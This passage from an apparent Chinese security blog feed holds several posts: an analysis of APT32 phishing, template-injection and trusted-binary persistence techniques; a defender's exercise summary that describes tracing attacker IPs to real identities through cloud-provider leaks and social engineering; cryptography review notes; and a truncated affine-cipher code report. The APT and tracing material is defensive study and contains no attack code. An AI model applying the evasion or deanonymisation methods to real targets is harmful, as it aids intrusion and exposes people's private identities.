文档图标,可同时伪装成文档文件进行钓鱼攻击,因此备受青睐。而为了凸显伪装 Word 文档的真实性,木马执行后会释放并启动一个 Word 文档迷惑受害者。</p><h4 id="以包含模板注入功能的-DOCX-文档为载体的攻击示例"><a href="#以包含模板注入功能的-DOCX-文档为载体的攻击示例" class="headerlink" title="以包含模板注入功能的 DOCX 文档为载体的攻击示例"></a>以包含模板注入功能的 DOCX 文档为载体的攻击示例</h4><p>样本 CV-AnthonyWei-CustomerService.docx 的主要功能为<strong>加载 Word 远程模板</strong>,远程模板中带有的<strong>恶意宏代码</strong>会从该 DOCX 文件中提取并释放出<strong>两个 PE 文件</strong>,并将其主程序加入到计划任务中。当该服务启动后会从内存中加载一个内嵌的 SCLoader,从远程服务器下载 Shellcode 并执行。该样本主要执行流程如下:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/aP3fltu7Cmn56HE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>该样本在微步云沙箱的分析结果如下图所示:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/NQfgi5nWITvsrKY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/bTP4epoO85R7gDs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>服务模块主要功能是内存加载一个名为 PostData.exe 的内嵌 EXE</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/fVaXKpjeMZW6JiA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>PostData.exe 通过命令行传入特定参数来下载并执行 Payload</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/NpDnZ4IPLcK9jrs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>APT32 拥有丰富的,自定义的武器库,其中 KerrDown 为其至少自 2018 年开始积极使用的下载器,被用于投递 Cobalt Strike Beacon 等后门。KerrDown 相关攻击手法画像如下:</p><table><thead><tr><th align="left">投递载体</th><th align="left">DOC(MHT),DOCX(TemplateInject),ZIP,RAR</th></tr></thead><tbody><tr><td align="left">技术特点</td><td align="left">多层 Shellcode,针对 Microsoft、Google、Adobe、Neuber 和 360 等的白加黑利用</td></tr><tr><td align="left">投递 Payload</td><td align="left">Cobalt Strike Beacon</td></tr><tr><td align="left">攻击目标</td><td align="left">中国,越南语用户</td></tr></tbody></table><h4 id="海莲花白利用持久化新型组合攻击方式"><a href="#海莲花白利用持久化新型组合攻击方式" class="headerlink" title="海莲花白利用持久化新型组合攻击方式"></a>海莲花白利用持久化新型组合攻击方式</h4><p>在日常狩猎海莲花攻击时,发现海莲花组织攻入企业内部后,滥用<strong>白利用技术,进行持久化驻留</strong>。配合横移技术以后,为了持久化驻留,使用了一个<strong>新的白利用</strong>驻留模式。</p><p>海莲花攻击步骤如下:</p><p>①攻陷企业内网管控端。</p><p>②使用攻陷的内网管控端,通过SMB/RPC建立与目标内网终端的远程服务连接。</p><p>③收集内网终端应用服务信息,同时收集其他可用于定制化的信息,例如:内网IP段,MAC地址,HostName等。</p><p>④将<strong>定制化后门模块</strong>下发至目标内网终端的指定目录中。</p><p>⑤将白文件下发替换内网终端的服务原可执行文件。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/TujgPoBEJeSFb5d.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>当内网终端原有任务计划启动服务时,相当于启动了白利用后门组合文件。根据对攻击过程的观察和分析,发现海莲花选择的目标服务主要是<strong>非系统服务</strong>,例如谷歌更新服务GoogleUpdate.exe,Adobe更新服务armsvc.exe。这些服务即使被替换也<strong>不会影响应用程序的正常使用</strong>。由于没有创建新服务项或修改原服务项的配置信息,仅替换原服务的可执行文件,用于替换的白文件也是可信文件,相当于模拟了一次应用程序文件升级的过程,以此来逃避安全软件的筛查。</p><h4 id="新旧白利用方式横向对比"><a href="#新旧白利用方式横向对比" class="headerlink" title="新旧白利用方式横向对比"></a>新旧白利用方式横向对比</h4><p>以往海莲花在使用白利用手法攻击时,大多是<strong>通过远程服务或远程任务计划启动白利用组合文件</strong>。当内网终端被远程连接时,会留下相关痕迹。并且无法<strong>持久化控制白利用组合文件的启动</strong>。本次使用的新方式,利用了被攻击者系统中已存在的正常程序(服务)的任务计划来定时启动白文件加载后门模块,同时实现了持久化驻留的目的。避免了因远程服务连接而留下痕迹的缺点。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/3o8jFVrBYwpH5gN.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>]]></content>
<summary type="html">
<h2 id="APT浅析"><a href="#APT浅析" class="headerlink" title="APT浅析"></a>APT浅析</h2>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>HVV工作总结</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/08/11/HVV%E5%B7%A5%E4%BD%9C%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/08/11/HVV%E5%B7%A5%E4%BD%9C%E6%80%BB%E7%BB%93/</id>
<published>2022-08-11T09:56:49.428Z</published>
<updated>2022-08-12T07:42:40.346Z</updated>
<content type="html"><![CDATA[<h3 id="HVV工作总结"><a href="#HVV工作总结" class="headerlink" title="HVV工作总结"></a>HVV工作总结</h3><a id="more"></a><h4 id="一、准备工作"><a href="#一、准备工作" class="headerlink" title="一、准备工作"></a>一、准备工作</h4><p>在护网开始前的两周,收集整理现有各种OA产品漏洞、web应用漏洞、CMS漏洞的POC,以及常见的webshell攻击手段例如冰蝎、蚁剑、哥斯拉、shiro的攻击特征。验证并编写包含请求头,请求体,响应头,响应体以及返回状态码的报文规则两百余条,以便护网期间能让大家更好的在平台上检测到各种攻击的手法。当然我之前是从来没有接触过这些漏洞的,所以在工作中也遇到了很多困难,犯了很多错误。</p><h4 id="二、护网情况"><a href="#二、护网情况" class="headerlink" title="二、护网情况"></a>二、护网情况</h4><p>我和带我的师傅两人在护网期间属于溯源分析组,主要任务是负责溯源红队的个人信息,撰写溯源报告,但也需要担任一些其他的工作。</p><p>1.报文规则的更新</p><p>在护网开始后,每天可能都会爆出各种0day,1day等等漏洞,我需要通过各种论坛,网站,博客,github上收集这些公开漏洞的POC,以及从hq那里得到的一些未公开漏洞的POC,然后整理更新报文规则,及时上传到我们的平台上。当有这种day攻击我们的企业时,我们便可以及时发现。在此期间,我也需要做漏洞验证的工作,有很多企业在平台上显示被注入了哥斯拉,冰蝎,蚁剑等,但是未必真正的注入成功,因此我需要拿这些webshell管理工具去连接这些URL,一旦连接成功,则表示企业被攻击成功,这样的话我便会告诉惠祁,他会与企业沟通然后做出一些具体措施。</p><p>2.样本分析</p><p>因为之前在学校做过一些逆向的题目,也参加过一些比赛,所以本次护网也参与一些样本分析的工作。我就拿一个普通的钓鱼样本举例,此样本主要用到的工具为PEID、StudyPE、IDA、x64dbg、火绒剑。首先我们要在沙箱中进行检测,看是否存在进程行为、网络行为等恶意行为,初步可以得到病毒启动是具有隐藏界面的,它隐藏在其他目录之中,并能修改网络代理且连接有多个域名等一系列操作。我们一定要在虚拟机中分析样本,这都是真毒,别把自己主机搞没了。运行样本之后,在火绒剑中捕捉样本行为动作,有设置注册表项,创建进程,文件增删改查,网络发包等操作。一般的样本都是用UPX或者VMP加过壳的,我们必须手动脱壳才能更好的进行下一步的分析。结合IDA和x64dbg的分析,可以更清楚的看到此样本会根据时间随机生成数作为文件名进行拼接,然后拷贝到我们的C盘目录下。在创建的线程中,通过分析可以判断为弱口令攻击,在IPC中内置了很多弱口令,根据此获取主机名以及网络连接的函数,通过弱口令感染局域网内其他主机。还有很多分析样本的具体细节就不在这里做过多解释,有时间的话我会分别把每个样本的分析过程都写出来的。总结一下就是分析得到样本中的具体逻辑行为以及敏感信息或者外联IP。虽然第一次分析钓鱼样本没有得到预期的效果,仅仅得到了一些CDN的IP,但是通过这此护网,也使我积累了很多分析的经验,希望下次能取得更好的成绩让自己满意。</p><p>3.溯源</p><p>这也是我第一次参加护网,所以可以说是零经验。在经过几天的摸索后,我们也渐渐的找到了一些正确的思路。首先根据我们前期在平台上录入的大量报文规则,可以每天大批量的导出IP,在筛除内网IP后,把剩余的IP放到微步中批量查询,再筛选出腾讯云,阿里云,百度云等有迹可循的恶意的红队IP。这里我们拿腾讯云IP举例,腾讯云的IP可以在腾讯云官网,通过抓包的方式得到注册此IP的人的QQ号前几位和后几位与手机号前几位与后几位的信息,然后通过各种whios查询,IP反查域名等网站查询注册域名的信息。这里有可能会查询到注册人的QQ邮箱,或者包含手机号的邮箱,看这些QQ号或者手机号是否与我们在腾讯云抓到的QQ号或手机号匹配,如果匹配那么即形成了闭环。在得到这些信息后,我们需要借助各种手法以及社工的方式找到其他信息,包括github地址,姓名,公司或者学校。这样便可以出一份溯源报告。</p><p>当然我们也可以通过扫描端口的方式,查看此红队IP是否开了一些不常见的端口。在这次护网中,就有一个IP开了8000端口,我们从此端口溯源到了这个人的具体信息。</p><p>溯源手法千变万化,没有统一的手法,在刚开始的几天试过很多错误的方法,但后来在摸清套路后,也渐渐走上正轨。在本次护网期间,我们一共出了6份溯源报告,也及时把这些红队信息以及攻击手段反馈给企业。</p><h4 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a><strong>三、总结</strong></h4><p>护网的机会是十分难得的,好在我没有浪费护网期间的每一天。在护网期间,每天都会面临新的挑战,学习新的东西。虽然十分辛苦,但还是特别充实的。期待在以后的工作中,不断进步,不断汲取新的知识,为下次护网打好基本功。</p>]]></content>
<summary type="html">
<h3 id="HVV工作总结"><a href="#HVV工作总结" class="headerlink" title="HVV工作总结"></a>HVV工作总结</h3>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>密码学复习总结</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/13/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%A4%8D%E4%B9%A0/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/13/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%A4%8D%E4%B9%A0/</id>
<published>2021-01-13T00:43:31.463Z</published>
<updated>2021-01-25T03:50:57.069Z</updated>
<content type="html"><![CDATA[<p>图书馆学不进去就赶紧写个总结水篇博客吧!</p><a id="more"></a><h2 id="第一章-密码学概述"><a href="#第一章-密码学概述" class="headerlink" title="第一章 密码学概述"></a>第一章 密码学概述</h2><p>密码学:密码是按特定法则编成、用以对通信双方的信息进行明文->密文变换的符号。或者说,密码是隐蔽了真实内容的符号序列。</p><p>是结合数学、计算机科学、电子与通讯等诸多学科于一体的交叉学科,是研究信息系统安全保密的一门科学。</p><p>密码体制,也称密码系统(Cryptosystem),由五部分组成:明文空间M,密文空间C,密钥空间K,加密算法E,解密算法D 。</p><h2 id="第三章-古典密码"><a href="#第三章-古典密码" class="headerlink" title="第三章 古典密码"></a>第三章 古典密码</h2><p>仿射密码:选取𝑘1,𝑘2两个参数,其中gcd(𝑘1, 26)=1<br>加密变换: 𝐶= 𝑘1∗𝑚+𝑘2 𝑚𝑜𝑑 26解密变换: 𝑚= (𝐶−𝑘2)∗〖𝑘1〗^(−1) 𝑚𝑜𝑑 26</p><h2 id="第四章-分组密码"><a href="#第四章-分组密码" class="headerlink" title="第四章 分组密码"></a>第四章 分组密码</h2><p>分组密码的设计要求:</p><p>分组长度要足够大:假设𝑛为分组长度,则要使2𝑛足够大,防止明文穷举攻击<br>密钥量要足够大:防止密钥穷举攻击<br>密码变换要足够复杂:使攻击者除穷举攻击外,找不到其他简洁的数学攻击方法<br>加密和解密运算简单:便于软件和硬件的实现</p><p>无数据扩展和压缩</p><p>扩散原则(移位):密钥或明文的每一比特变化影响密文的许多比特的变化,以便隐蔽明文的统计特性(形象的称为雪崩效应)</p><p>混淆原则(替代):又称混乱原则,指密钥和明文以及密文之间的依赖关系尽可能的复杂化,以防通过统计分析法进行破译(如使用非线性变换)</p><p>乘积密码体制</p><p>Feistel网络的优点在于加解密相似性,它只需要一个逆转的密钥编排算法,其加解密部分几乎完全相同</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/13/FtmKHajRQqOvJyz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>SP网络是由多重S变换和P变换组合成的变换网络<br>基本操作是S变换(代换)和P变换(置换),前者称为S盒,后者称为P盒<br>S盒起到混乱作用,P盒起到扩散的作用</p><p>DES轮函数F:扩展置换(E盒),密钥加,非线性代换(S盒),线性置换(P盒)</p><p>加密方程:<br>L0R0 ←IP(<64位明文>)<br>Ln←Rn-1<br>Rn← Ln-1+(Rn-1,Kn)<br><64位密文>← IP-1(R16L16)</p><p>解密方程:<br>R16L16 ←IP(<64位密文>)<br>Rn-1←Ln<br>Ln-1← Rn+(Ln,Kn)<br><64位明文>← IP-1(L0R0)</p><p>S盒设计准则:具有良好的非线性(输出的每个比特与全部输入比特有关)<br>每一行包括所有16种4位二进制<br>两个输入相差1比特时,输出相差2比特<br>如果两个输入刚好在中间两个比特上不同,则输出至少有两个比特不同<br>如果两个输入前两位不同而最后两位相同,则输出一定不同<br>相差6比特的输入共有32对,这32对中有不超过8对的输出相同</p><p>DES子密钥是从初始密钥(种子密钥)产生的<br>种子密钥𝐾为64位,其中有8位用于奇偶校验,分别位于第8,16,24,32,40,48,56,64位<br>奇偶校验位用于检查密钥𝐾在产生和分配以及存储过程中可能发生的错误<br>DES的密钥实际上只有56位</p><p>DES的安全性:互补性:对明文𝑚逐位取补,记为𝑚 ̅,密钥𝐾逐位取补,记为𝑘 ̅ , 若𝑐=𝐸𝑘(𝑚),则有𝑐 ̅=𝐸𝑘 ̅ (𝑚 ̅) ,称为算法上的互补性<br>由算法中两次异或运算的配置决定:两次异或运算一次在S盒之前,一次在P盒置换之后若对DES 的明文和密钥同时取补,则扩展运算E的输出和子密钥产生器的输出也都取补,因而经异或运算后的输出和未取补时的输出一样,即到达S盒的输入数据未变,输出自然也不变,但经第二个异或运算时,由于左边数据已取补,因而输出也就取补。弱密钥:给定初始密钥𝐾生成子密钥时,将种子密钥分成两个部分,如果𝐾使得这两部分的每一部分的所有位置全为0或1,则经子密钥产生器产生的各个子密钥都相同,即𝐾1=𝐾2=…=𝐾16,则称密钥𝐾为弱密钥(共有4个)若𝐾为弱密钥,则对任意的64比特信息有: 𝑬𝒌(𝑬𝒌(𝒎))= 𝒎 和 𝑫𝒌(𝑫𝒌(𝒎))= 𝒎半弱密钥:把明文加密成相同的密文,即存在两个不同的密钥𝑘和𝑘′,使得𝐸𝑘 (𝑚)=𝐸(𝑘^′ ) (𝑚)具有下述性质:若𝑘和𝑘′为一对弱密钥,𝑚为明文组,则有:𝐸(𝑘^′ ) (𝐸𝑘 (𝑚))=𝐸𝑘 (𝐸_(𝑘^′ ) (𝑚))=𝑚迭代轮数,密钥的长度 </p><p>字节代换行移位列混合轮密钥加</p><p>乘 0x01 -> 不变<br>乘 0x02最高位为 0,直接左移一位 最高位为 1,左移一位后与0001 1011 异或<br>乘 0x03,0000 0011= 0000 0010⊕0000 0001<br>乘以 0x03 可以拆为分别称为 0x01 和 0x02,再将结果异或.</p><p>AES和DES相似之处:二者的轮函数都是由三层构成,非线性层、线性混合层、子密钥异或,只是顺序不同<br>AES的子密钥异或对应于DES中S盒之前的子密钥异或<br>AES的列混合运算的目的是让不同的字节相互影响,而DES中F函数的输出与左边一半数据相加也有类似的效果<br>AES的非线性运算是字节代替(ByteSub),对应于DES中惟一的非线性运算S盒<br>行移位运算保证了每一行的字节不仅仅影响其它行对应的字节,而且影响其它行所有的字节,这与DES中置换P相似</p><p>AES和DES不同之处:AES的密钥长度(128位、192位、256位)是可变的,而DES的密钥长度固定为56位<br>DES是面向比特的运算,AES是面向字节的运算<br>AES的加密运算和解密运算不一致,因而加密器不能同时用作解密器,DES则无此限制</p><p>电码本模式(ECB ) 密文中数据出了错,解密事会使得相应的整个明文分组解密错误,不影响其他密文块的解密<br>密码分组链接模式(CBC ) 没有明文错误扩散 只有一个分组错误 解密分组影响对应的解密明文分组和其后的一个</p><p>密码反馈模式(CFB) 明文的一个错误影响所有后面的密文但解密的明文只有一组分组错误 密文里单独的一个错误会引起解密后的对应明文的一个错误,错误进入移位寄存器,导致加密输出错误,知道该错误从寄存器另一端移出 8比特CFB中,密文1比特错误,解密后明文9比特错误</p><p>输出反馈模式(OFB) 1对1错误 失去同步是致命的</p><p>计数器模式(CTR) 并行性 硬件效率 软件效率 预处理 随机访问 可证明安全性 简单性</p><h2 id="第六章-哈希函数"><a href="#第六章-哈希函数" class="headerlink" title="第六章 哈希函数"></a>第六章 哈希函数</h2><p>Hash函数的概念</p><p>•Hash函数(杂凑函数/散列函数)是将任意长的消息M变换为较短的、固定长度的值H(M)的不可逆的单向密码体制</p><p>•H(M)称为杂凑值、杂凑码或消息摘要</p><p>•H(M)打上了输入串的烙印,又称为<strong>数字指纹</strong>(Digital FingerPrint)</p><p>Hash函数(杂凑函数)的基本特征:</p><p>•<strong>算法公开,不需要密钥</strong></p><p>•<strong>数据压缩:</strong>可将<strong>任意长度的输入</strong>数据变换成一个<strong>固定长度的输出</strong></p><p>•<strong>易于计算:</strong>对任何给定的m,h(m)易于计算</p><p>•单向性(抗原像性,Pre-image Resistance):给定消息的散列值h(m),要得到消息m在计算上不可行、</p><p> 函数 <em>y</em>=<em>H</em>(<em>x</em>)满足</p><p>I.将任意长度的比特串<em>x</em>压缩成为固定长度的比特串<em>y</em></p><p>II.已知<em>x</em>,计算<em>y</em>=<em>H</em>(<em>x</em>)很容易;已知<em>y</em>,找一个<em>x</em>满足<em>y</em>=<em>H</em>(<em>x</em>)在计算上不可行——单向性</p><p>III.找(<em>x</em>1,<em>x</em>2),<em>x</em>1≠<em>x</em>2,满足<em>H</em>(<em>x</em>1)= <em>H</em>(<em>x</em>2)在计算上是不可行的<em>———</em>抗碰撞性</p><p>Hash函数必须满足以下安全性要求:</p><p>抗弱碰撞性;抗第二原像; 对任意给定的消息m,寻找与m不同的消息m’,使得h(m)=h(m’)在计算上不可行</p><p>抗强碰撞性(Strong Collision Resistance) : 寻找任意两个不同的消息m和m’,使得h(m)=h(m’)在计算上不可行</p><p>消息填充 </p><p>•步骤1(填充消息):使消息长度模512=448</p><p>•如果消息长度模512恰等于448,增加512个填充比特。即填充的个数为1~512</p><p>•填充方法:第1比特为1,其余全部为0</p><p>•步骤2(补足长度): 将消息长度转换为64比特的数值</p><p>•如果长度超过64比特所能表示的数据长度,值保留最后64比特</p><p>•添加到填充数据后面,使数据为512比特的整数倍</p><p>•512比特按32比特分为16组。最终输出 128 位(即 16 字节,32 个十六进制位)的消息摘要。过程为 4 轮,每轮 16 步,共 64 步。</p><h2 id="第七章-公钥密码"><a href="#第七章-公钥密码" class="headerlink" title="第七章 公钥密码"></a>第七章 公钥密码</h2><p>密钥的生成</p><ol><li>选择两个大素数 p和q,(p≠q,需要保密,步骤4以后建议销毁)</li></ol><ol start="2"><li><p>计算n=p×q, j(n)=(p-1)×(q-1)</p></li><li><p>选择整数 e 使 (j(n),e) =1, 1<e< j(n) </p></li><li><p>计算d,使d=e-1 mod j(n),</p></li></ol><p> 得到:公钥为{e, n}; 私钥为{d}</p><p>加密(用e,n): 明文M<n, 密文C=M^e (mod n).</p><p> 解密(用d,n): 密文C, 明文M =C^d (mod n)</p><p>1.若gcd(𝒎,𝒏)=𝟏,<br>𝐶𝑑 𝑚𝑜𝑑 𝑛=(𝒎^𝒆)𝑑 𝑚𝑜𝑑 𝑛 =𝒎^𝒆𝒅 𝑚𝑜𝑑 𝑛≡𝑚 𝑚𝑜𝑑 𝑛<br>2.若gcd(𝒎,𝒏)>𝟏,由于𝒏=𝒑𝒒,所以gcd(𝒎,𝒏)必含𝒑,𝒒之一,设gcd(𝒎,𝒏)=𝒑或𝒎=𝒄𝒑, 𝟏≤𝒄≤𝒒,由欧拉定理得:<br>𝒎^(𝝋(𝒒))=𝟏(𝒎𝒐𝒅 𝒒).<br>𝒎^(𝒒−𝟏)(𝒑−𝟏)𝒌=𝟏(𝒎𝒐𝒅 𝒒)<br>即 𝒎^(𝒌𝝋(n))=𝟏(𝒎𝒐𝒅 𝒒) 或 𝟏=𝒎^(𝒌𝝋(n))+𝒉𝒒<br>由假定𝒎=𝒄𝒑得:<br>𝒎=𝒎^(𝒌𝝋(n)+𝟏)+𝒄𝒉𝒑𝒒=𝒎^(𝒌𝝋(n)+𝟏)+𝒂𝒏 (其中𝒂=𝒄𝒉),<br>即𝒎^(𝒌𝝋(n)+𝟏)=𝒎 (𝒎𝒐𝒅 𝒏)</p><p>共模攻击:假设𝑚是明文,两用户的公钥分别是𝑒1和𝑒2,且(𝑒1,𝑒2)=1,共同的模数𝑁,两个密文分别为:<br>𝑐_1≡𝑚^(𝑒_1 ) 𝑚𝑜𝑑 𝑁<br>𝑐_2≡𝑚^(𝑒_2 ) 𝑚𝑜𝑑 𝑁<br>攻击者知道𝑁,𝑒1,𝑒2,𝑐1和𝑐2,可如下恢复明文𝑚<br>(𝑒1,𝑒2)=1,由欧几里德算法可找出𝑟,𝑠满足𝑟𝑒1+𝑠𝑒2=1。假定𝑟是负数,那么<br>(𝒄𝟏)^(−𝟏)^(−𝒓)∙(𝒄𝟐)^𝒔=𝒎^(𝒓𝒆𝟏+𝒔𝒆𝟐)≡𝒎 𝒎𝒐𝒅 𝑵</p><p>低指数攻击:小的公钥可加快加密的速度,但过小的公钥易受到攻击</p><p>如果3个用户都使用3作为公钥,对同一个明文m加密,则c1=m3 (mod n1),c2=m3 (mod n2),c3=m3 (mod n3), gcd(n1,n2,n3)=1 ,且m<n1,m<n2,m<n3</p><p>由中国剩余定理可从c1,c2,c3计算出c,且c=m3 mod (n1n2n3 ),显然m3<n1n2n3,所以m=c^(1/3)</p><p>1.<strong>密钥的生成</strong></p><p> 选取大素数p,g∈〖Z_p〗^∗是一个生成元,p,g 作为系统参数所有用户共享</p><p> 系统中每个用户U都随机挑选整数x,2≤x≤ p-2,并计算:</p><p> y=gx(mod p),</p><p> y, p, g作为用户U的公钥,而x作为用户U的私钥</p><p>2.<strong>加密:</strong></p><p>1.用户A先把明文M编码为一个在 0 到p-1之间的整数m ;</p><p>2.用户A挑选一个秘密随机数 r (2≤ r ≤ p-2 )并计算:c1= g^r (mod p);</p><p> c2 = m∙y^r(mod p)</p><p>3.用户A把二元组 (c1,c2)作为密文传送给用户B</p><p>解密:<br> 用户B接收到密文二元组(𝑐1 ,𝑐2)后,做解密计算:<br>𝒎=𝒄𝟐∙(𝒄𝟏^𝒙 )^(−𝟏)𝒎𝒐𝒅 𝒑</p><p>正确性:C2.(C1^x)^(-1) (modp)=(y^r m)(^rx)^(-1) (mod p)<br>=(g^rx m)g^-rx (mod p)<br>=m (mod p)</p><h2 id="第八章-数字签名"><a href="#第八章-数字签名" class="headerlink" title="第八章 数字签名"></a>第八章 数字签名</h2><p>2、利用RSA密码实现数字签名:<br>⑴签名算法<br>设M为明文,KeA =<e,n>是A的公开加密钥,<br>KdA =<d,p,q,φ(n)>是A的保密的解密钥,<br>则A对M的签名过程是,<br>SA = D(M,KdA) =(M^d) modn SA 便是A对M的签名。<br> 验证签名的过程是,<br>E(SA ,KeA)=(M^d)^e modn = M</p><p>安全性:</p><p>对RSA数字签名的攻击:利用已有的签名进行攻击:此时:S1=(HASH(M1))d mod n ,S2=(HASH(M2))d mod n<br>而,(HASH(M1))d (HASH(M2))d≠(HASH(M1M2))d mod n<br> 所以:S3≠S1S2 ,于是不能由S1和S2计算出A对M3的签名。</p><p>𝑯(𝑴)的另一个作用—加快签名速度<br>对整个消息签名,由于公钥体制速度比较慢,当消息比较长时,签名与验证过程都会相当慢<br>对消息的Hash值签名,则无论消息多长,签名都只与Hash值的长度有关</p><p>ElGamal签名过程:</p><p>1.系统初始化过程:公钥为(p,g,y),私钥为x (1≤x<p-1),其中y≡g^xmod p</p><p>2.签名过程:给定消息M,签名者如下计算:</p><p> ①选择随机数k∈Zp∗,且k与(p-1)互素;</p><p> ②首先计算消息M的哈希值H(M),然后计算:</p><p> r≡g^k(mod p);</p><p> s≡(H(M)-xr) k^(-1) (mod p-1) </p><p> ③ 将(r,s)作为签名,与M一起发送给接收方</p><p>3.验证签名过程:接收方收到M与其签名(r,s)后:</p><p> ① 计算消息M的Hash值H(M);</p><p> ② 验证公式 </p><p>y^r r^s≡g^(H(M)) mod p</p><p> 成立则确认(r,s)为有效签名,否则认为签名是伪造的</p><p>安全性:</p><p>非确定性数字签名算法,同一消息M的签名依赖于随机数k;安全性基于有限域上计算离散对数的困难性;随机数k不能被泄露(已知k可以计x) x=(m-ks)^(r-1)mod(p-1);随机数k不能被重复使用(泄露x);不使用Hash函数则易受到攻击攻击者可以选取任一整数对(𝑢,𝑣),满足 𝑔𝑐𝑑(𝑣,𝑝−1) = 1计算 𝑟 = 𝑔^𝑢𝑦^𝑣 𝑚𝑜𝑑 𝑝 = 𝑔^(𝑢+𝑥𝑣) 𝑚𝑜𝑑 𝑝 和 𝑠 = −𝑟𝑣^(−1) 𝑚𝑜𝑑 (𝑝−1),则(𝑟,𝑠)就是对消息𝑚 = 𝑠𝑢 𝑚𝑜𝑑 𝑝的一个有效签名因为𝑘= (𝑚−𝑥𝑟)𝑠^(−1)= (𝑠𝑢−𝑥𝑟)𝑠^(−1)= (𝑢+𝑥𝑣) 𝑚𝑜𝑑 (𝑝−1),所以有 𝑟 = 𝑔^𝑘 =𝑔^(𝑢+𝑥𝑣) 𝑚𝑜𝑑 𝑝</p><h2 id="第九章-密码协议"><a href="#第九章-密码协议" class="headerlink" title="第九章 密码协议"></a>第九章 密码协议</h2><p>比特承诺 安全性质:1.隐蔽性:Alice像Bob承诺时,Bob不可能获得承诺消息的任何信息。2.绑定性:一段时间后A能够像B证明她所承诺的消息,但是A不能欺骗B,也就是说,在这段时间里A不能改变承诺的消息。</p>]]></content>
<summary type="html">
<p>图书馆学不进去就赶紧写个总结水篇博客吧!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>密码学课程设计报告</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/11/%E5%AF%86%E7%A0%81%E5%AD%A6%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1%E6%8A%A5%E5%91%8A/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/11/%E5%AF%86%E7%A0%81%E5%AD%A6%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1%E6%8A%A5%E5%91%8A/</id>
<published>2021-01-11T15:00:42.495Z</published>
<updated>2021-01-12T12:59:01.006Z</updated>
<content type="html"><![CDATA[<p>嫖了各种大佬的博客!</p><a id="more"></a><h2 id="仿射密码-Affine-Cipher"><a href="#仿射密码-Affine-Cipher" class="headerlink" title="仿射密码 Affine Cipher"></a>仿射密码 <em>Affine Cipher</em></h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>仿射密码也属于单表代换密码,它使用线性方程加上一个模数。</p><p><strong>仿射密码</strong>为单表加密的一种,字母系统中所有<a href="https://baike.baidu.com/item/字母/1710184" target="_blank" rel="noopener">字母</a>都藉一简单数学方程<a href="https://baike.baidu.com/item/加密/752748" target="_blank" rel="noopener">加密</a>,对应至数值,或转回字母。</p><h3 id="算法实现"><a href="#算法实现" class="headerlink" title="算法实现"></a>算法实现</h3><h4 id="加密算法"><a href="#加密算法" class="headerlink" title="加密算法"></a>加密算法</h4><p>仿射密码的加密算法是一个线性变换,是移位密码和乘数密码的组合,即对任意的明文字符 x,选取 k1,k2 两个参数,其中 k1,k2∈Z26,且要求 gcd (k1,26)=1。 </p><p>加密变换:C=k1*m+k2 (mod26)(当 k1=1 时,移位密码;当 k2=1 时,乘数密码);</p><p>加密的功能:①基本的仿射加密完全实现,大写转成大写,小写转成小写; </p><p>②判断出 k1 与 26 不互素时利用跳转语句 goto 提示 k1 输入错误,需要重新输入; </p><p>③字母外的字母保持原来的状态,不作任何处理,按照输入的样子输出; </p><p>④利用 cin.getline () 语句和 cin.ignore () 语句,确保在 while (true) 的条件下可以反复进行加密。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">int</span> m[maxn];</span><br><span class="line"><span class="comment">// 将字符移位操作的位数存到数组 m [maxn] 里面 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span 